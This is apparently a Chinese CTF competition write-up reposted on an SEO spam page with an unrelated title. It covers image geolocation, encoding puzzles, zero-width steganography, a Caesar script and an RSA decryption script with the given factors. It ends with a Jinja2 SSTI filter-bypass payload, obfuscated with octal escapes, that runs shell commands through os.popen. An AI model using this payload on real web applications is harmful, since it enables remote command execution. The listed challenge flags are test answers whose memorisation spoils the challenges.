您的位置:首页 > 财经 > 金融 > 武汉手机模板建站_武汉网站建设哪家便宜_东莞推广_网络营销方式有哪些

武汉手机模板建站_武汉网站建设哪家便宜_东莞推广_网络营销方式有哪些

2024/12/23 16:51:28 来源:https://blog.csdn.net/2301_79355407/article/details/144541529  浏览:    关键词:武汉手机模板建站_武汉网站建设哪家便宜_东莞推广_网络营销方式有哪些
武汉手机模板建站_武汉网站建设哪家便宜_东莞推广_网络营销方式有哪些

Forensics

签到

找到flag

Flag{成都宽窄巷子蜀韵园}

Google识图,找到fackbook上有相同的店名

接下来把上图标红区域放到google地图中,找到位置

Url读取坐标,拿到flag

flag{2216612d65abe33f05c1662d53a6faf8}

Google搜图

不知道雕塑名字,但是百度后得知这是某传道士雕塑。Chatgpt问了一下

Google地图查找到位置

Url读取坐标,拿到flag

flag{755947b6b90b7a9676282f0ff2151e48}

以上思路可以让我确认这个位置的范围:蒙古国西部

然后我就跟着这个路线全国旅游!!

看了差不多五六个小时。后面我改变思路

右下角的指南针,从而明确我的思路:只找下坡路

花了半小时左右成功找到。

45.810,101.905

Flag{6129f45f8cc17063cc47828895042b17}

Misc

简简单单

From Hex

核心主义价值观解码

From Hex

Emoji解码

From Hex

这里最离谱的就是我想到base62!但是我的工具和在线网站包括试了脚本,都解出乱码,我又试了不同的字符集。最后在一个在线网站解密成功

base编码解码-base64、base32、base16加密与解密 - 在线工具 (wqtool.com)

 Base58解码:

随波逐流梭哈,拿到flag

flag{8yvLhxrd1k0ap0df}

Sign in

首先拿到密文,这里看前面格式就能猜出是凯撒+base64转图片

 AI写个脚本跑凯撒

def caesar_decrypt(text, shift):decrypted_text = []for char in text:if char.isalpha():  # 只解密字母offset = 65 if char.isupper() else 97  # 对于大写字母和小写字母进行不同处理decrypted_char = chr((ord(char) - offset - shift) % 26 + offset)decrypted_text.append(decrypted_char)else:decrypted_text.append(char)  # 非字母字符直接加入结果return ''.join(decrypted_text)def decrypt_all_shifts(input_file, output_file):try:# 读取文件内容with open(input_file, 'r', encoding='utf-8') as infile:encrypted_text = infile.read()# 打开输出文件进行写入with open(output_file, 'w', encoding='utf-8') as outfile:for shift in range(26):  # 尝试所有可能的位移值(0 到 25)decrypted_text = caesar_decrypt(encrypted_text, shift)outfile.write(f"--- Shift {shift} ---\n")outfile.write(decrypted_text)outfile.write("\n\n")  # 每个解密结果之间留空行print(f"所有解密结果已保存到 {output_file}")except Exception as e:print(f"发生错误: {e}")# 使用示例
input_file = '1.txt'  # 输入文件(加密后的文本)
output_file = 'bb.txt'  # 输出文件(所有解密结果)
decrypt_all_shifts(input_file, output_file)

提取数据,base64转图片

 

一张奶龙的图片,没用任何提示,一种方法一种方法试,从早试到晚,根据hint,冷门的隐写,在这个网站中成功提取flag

 

flag{wobushinailong_woshihuangdou} 

Crypto

不要忘记仰望星空

社会主义核心价值观解码

一眼盲文解密,随波逐流没梭哈出来

测试以后是粤语

解码后结果:不过有些乱码,最后就删掉了

\u897f\u5929\u53d6\u7ecf\u7684\u5510\u4e09\u85cf\uff0c\u00a\u795e\u79d8\u800c\u6709\u80fd\u529b\u7684\u5b59\u609f\u7a7a\uff0c\u00a\u603b\u60f3\u6253\u9000\u5802\u9f13\u7684\u73丸\u516b\u6愿2\uff0c\u00a\u8d1f\u8d23\u80㬹\u884c\u674e\u7684\u6櫍9\u50e7\uff0c\u00a\u4e2d\u9014\u5丸0\u5165\u7684\u767da\u9㧾9\u9a6c\uff0c\u00a\u00a\u5b㧾\u4e86\uff0c\u8fd8\u6709\u90a3\u6839\u8d8a\u6765\u8d8a\u957f\u7684\u5982\u灧0f\u91d1\u7b8d\u68d2\u00a\u00a\u2014\u2014\u300a\u0066\u006c\u00灧\u0067\u300b

很明显,unicode解码

 

Flag在《》中,AI了一下上面的文字尝试flag{宇宙探索编辑部},成功

 

flag{宇宙探索编辑部}

Base1024

解码以后,(我以为是某种稀奇古怪的解密)

flag包裹起来:

Flag{脑洞竞技 代码逆向 漏洞挖掘 团队协作 密码破译 云端对决}

Math

梭哈

拿到p,q

 AI生成解密脚本

from Crypto.Util.number import inverse, long_to_bytes# 已知的 p, q, n, e, c
n=739243847275389709472067387827484120222494013590074140985399787562594529286597003777105115865446795908819036678700460141950875653695331369163361757157565377531721748744087900881582744902312177979298217791686598853486325684322963787498115587802274229739619528838187967527241366076438154697056550549800691528794136318856475884632511630403822825738299776018390079577728412776535367041632122565639036104271672497418509514781304810585503673226324238396489752427801699815592314894581630994590796084123504542794857800330419850716997654738103615725794629029775421170515512063019994761051891597378859698320651083189969905297963140966329378723373071590797203169830069428503544761584694131795243115146000564792100471259594488081571644541077283644666700962953460073953965250264401973080467760912924607461783312953419038084626809675807995463244073984979942740289741147504741715039830341488696960977502423702097709564068478477284161645957293908613935974036643029971491102157321238525596348807395784120585247899369773609341654908807803007460425271832839341595078200327677265778582728994058920387721181708105894076110057858324994417035004076234418186156340413169154344814582980205732305163274822509982340820301144418789572738830713925750250925049059
c=229043746793674889024653533006701296308351926745769842802636384094759379740300534278302123222014817911580006421847607123049816103885365851535481716236688330600113899345346872012870482410945158758991441294885546642304012025685141746649427132063040233448959783730507539964445711789203948478927754968414484217451929590364252823034436736148936707526491427134910817676292865910899256335978084133885301776638189969716684447886272526371596438362601308765248327164568010211340540749408337495125393161427493827866434814073414211359223724290251545324578501542643767456072748245099538268121741616645942503700796441269556575769250208333551820150640236503765376932896479238435739865805059908532831741588166990610406781319538995712584992928490839557809170189205452152534029118700150959965267557712569942462430810977059565077290952031751528357957124339169562549386600024298334407498257172578971559253328179357443841427429904013090062097483222125930742322794450873759719977981171221926439985786944884991660612824458339473263174969955453188212116242701330480313264281033623774772556593174438510101491596667187356827935296256470338269472769781778576964130967761897357847487612475534606977433259616857569013270917400687539344772924214733633652812119743
p = 24440283427735860782323152407294917357529111353275570975703531438440519660225708967888657253644278000783263820558388701592370615088140947096898134081330591301984360290318641970617489021626752360815885812583176251873031239638493762071047588297627032203293985708994218852662838640238623254740905447146670999830187552717802257362427107073858485019955606331947972091793616373347825119600328855885246072890798551616534636247023983959037046475229361825549780845049341719145179099452625523855259198581865855234803188298849910863377098140158406245399677912502444220011884063994451182221171275547685147549629637310805120817903q = 30246942489892106712702239024133721453592842183923733460515110118344404699532017493383428137697227815754741688919151294652492006534840589468962295623069884232619077280815851563195685517196295248643553001644121714958636538938848623892827992267767358030468030240236589927767000556188518269847757669474128501561192367465343050094302650720121351543751423298130335191141395620744634566228434135430114855211983270131333333081108536699301711234514426855659414263828163630092200163488598896179597996128556748173083374014319100056717308084410389660477779719495877439609162161870536882293104016630319703274657500915447940613453
e = 65537# 计算 phi(n)
phi_n = (p - 1) * (q - 1)# 计算私钥指数 d
d = inverse(e, phi_n)# 解密密文 c
m = pow(c, d, n)# 将明文数字 m 转换为字节(得到明文消息)
flag = long_to_bytes(m)print("解密后的消息:", flag.decode())

 

EzCrypto

 e= 65537 n = 1455925529734358105461406532259911790807347616464991065301847 c = 69380371057914246192606760686152233225659503366319332065009

RSA梭哈

 

flag{fact0r_sma11_N}

签到

小时候我很讨厌烟味儿,所以经常能看见爸爸一个人在家门外抽烟,我每次隔着猫眼看着他,他不说一句话‌‌‌‌‍‬‍‬,就静静的抽完一支烟,在门外站大概五六分钟的样子才会进家,大概是为了散烟味儿吧。每次爸爸一开门,就会看见我。爸爸很高,他的手掌很大‌‌‌‌‍‬‌,小时候我一直认为爸爸是个英雄,‌‌‌‌‍‬‌‍现在也这样认为。我的英雄总会用他宽厚的手掌摸我的头,然后又蹲下对我说:"儿子,现在是你等爸爸回家,等爸爸老了,就换成我在家等你了。‌‌‌‌‍‬‍"当时我太小了,‌‌‌‌‍‬没理解爸爸说的话的意思。高中的时候,偶然一次写到了父亲的作文,脑海里突然蹦出来这句意味深长的话,那一刹那我忽然明白了。

又记得一次,是在我备战高考的时候,当时压力很大,整宿整宿睡不着觉。每个晚上我正在为我的学业焦头烂额,‌‌‌‌‍‌‬‌后来实在撑不住了,决定去楼下买烟,没准儿抽烟了灵感就来了。记得当晚买的是宽窄,我很喜欢细宽,我也喜欢成都这座城市。烟刚点上没多久,爸爸就打来了视频。视频刚接上,我刚好抽了一口,呼了一口气‌‌‌‌‍‌‌‌,我还没来得及喊爸爸,他就对我说:"累了吧,挺住啊!"爸爸的话,倒是让我安心了不少。我点了点头,又跟爸爸聊了我的学业、生活,告知他我各方面都挺好的,不必担心,爸爸也点点头‌‌‌‌‍‍‬。在视频快要挂断时,他对我说了句:"娃儿,抽完这根烟,就上楼吧,重新振作起来。‌‌‌‌‌‌"我当时其实是很惊讶的,我以为我把自己的坏情绪伪装的很好了,但是爸爸却还是能看出我的难过。虽然是短短的一句话,但对当时的我来说,却是无比的安心‌‌‌‌‍‍。他是超人,我永远的超人‌‌‌‌‍‬‍‬。

这段时间,我又遇到了瓶颈。学业上的烦恼‌‌‌‌‍‍‍‍,人情世故杂七杂八的,都让我喘不过气,所以就想起了以前的事情。编辑完这些文字,好像又觉得自己能行了。像当年那样,重新振作起来吧。

今晚,依然抽的是宽窄。‌‌‌‌‍‬‬‌

0宽度隐写梭哈

 Web

Ez_python

提示get传参读取源文件,但是发现被过滤。扫目录扫到shell,根据提示很容易想到get/post传参name

这里就怀疑是SSTI漏洞,尝试/shell?name={{%202*2%20}}但是发现被过滤

找到一篇SSTI绕过方法

【WEB】SSTI | 狼组安全团队公开知识库 (wgpsec.org)

尝试八进制绕过,尝试无脑用他的payload,命令执行成功

{%print%0a(lipsum|attr("\137\137\147\154\157\142\141\154\163\137\137"))|attr("\137\137\147\145\164\151\164\145\155\137\137")("\137\137\142\165\151\154\164\151\156\163\137\137")|attr("\137\137\147\145\164\151\164\145\155\137\137")("\145\166\141\154")("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\160\157\160\145\156\50\47\154\163\47\51\56\162\145\141\144\50\51")%}

读取flag:

flag{03c79ba2-ae09-4426-b5c8-a01c1d527dcc}

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com